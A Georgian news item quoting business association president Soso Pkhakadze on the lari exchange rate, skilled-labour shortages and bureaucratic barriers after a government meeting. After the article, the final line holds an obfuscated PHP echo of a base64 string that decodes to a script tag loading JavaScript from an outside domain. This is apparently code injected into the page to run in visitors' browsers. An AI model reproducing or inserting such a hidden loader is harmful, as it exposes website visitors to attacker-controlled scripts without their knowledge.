celsiusi
ავერსი საქკაბელი
ბიზნეს ასოციაციის პრეზიდენტის,სოსო ფხაკაძის განცხადებით, ბიზნესის ძირითადი გამოწვევები ლარის კურსის სტაბილურობა და პროფესიონალი კადრების დეფიციტია. ამის შესახებ მან მთავრობისა და ბიზნესსექტორის წარმომადგენლებს შორის გამართული შეხვედრის შემდეგ განაცხადა. 
 
„ჩვენ მხოლოდ პოზიტიურ მხარეზე არ ვისაუბრეთ. ბიზნესში არის გამოწვევები, ხელის შემშლელი ფაქტორები. ერთ-ერთი არის კვალიფიციური მუშახელის პრობლემა, ასევე სამუშაო ძალის პრობლემა და ჩვენ ამ გამოწვევებზე ვისაუბრეთ. ამ გამოწვევებს ერთად უნდა მივხედოთ ბიზნესმაც და მთავრობამაც. ეს არის მესამე, მეოთხე პრობლემა. ნომერ პირველი პრობლემა მნიშვნელოვნად შემცირდა და ეს არის ლარის კურსი. წლების განმავლობაში ნომერ პირველი პრობლემა იყო. ამ სიტუაციას მიეხედა და შიდა ბაზარზე ხედავთ, რომ ლარი მნიშვნელოვნად გამყარდა. ჩვენ გვინდა, რომ აუცილებლად შენარჩუნდეს ეს ტენდენცია. კომპანიების 95%-ის მაგივრად, მხოლოდ 60% ასახელებს, რომ ეს არის მათთვის პრობლემა. თუმცაღა ეს პრობლემები, ლართან დაკავშირებით, ჯერ არ არის ბოლომდე მოშუშებული და თუ ეს ვითარება გაგრძელდება სავალუტო ბაზარზე, დარწმუნებული ვართ, უკვე შემდეგ კვარტალში 60% გახდეს 50 და ასე შემდეგ. ბოლო პრობლემა არის ბიუროკრატია. ამ მხრივ ვითარება სწორდება, მაგრამ არსებობს ადმინისტრაციული ბარიერები. ჩვენ კონკრეტულად ვესაუბრეთ პრემიერს და უნდა მიხედოს ამ თემას, უნდა გაგრძელდეს ამ კუთხით მუშაობა. პროცენტულად ადმინისტრაციულ ბარიერებს ვინც ასახელებს, დაახლოებით 13%-ით შემცირდა“, – განაცხადა სოსო ფხაკაძემ.
441
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");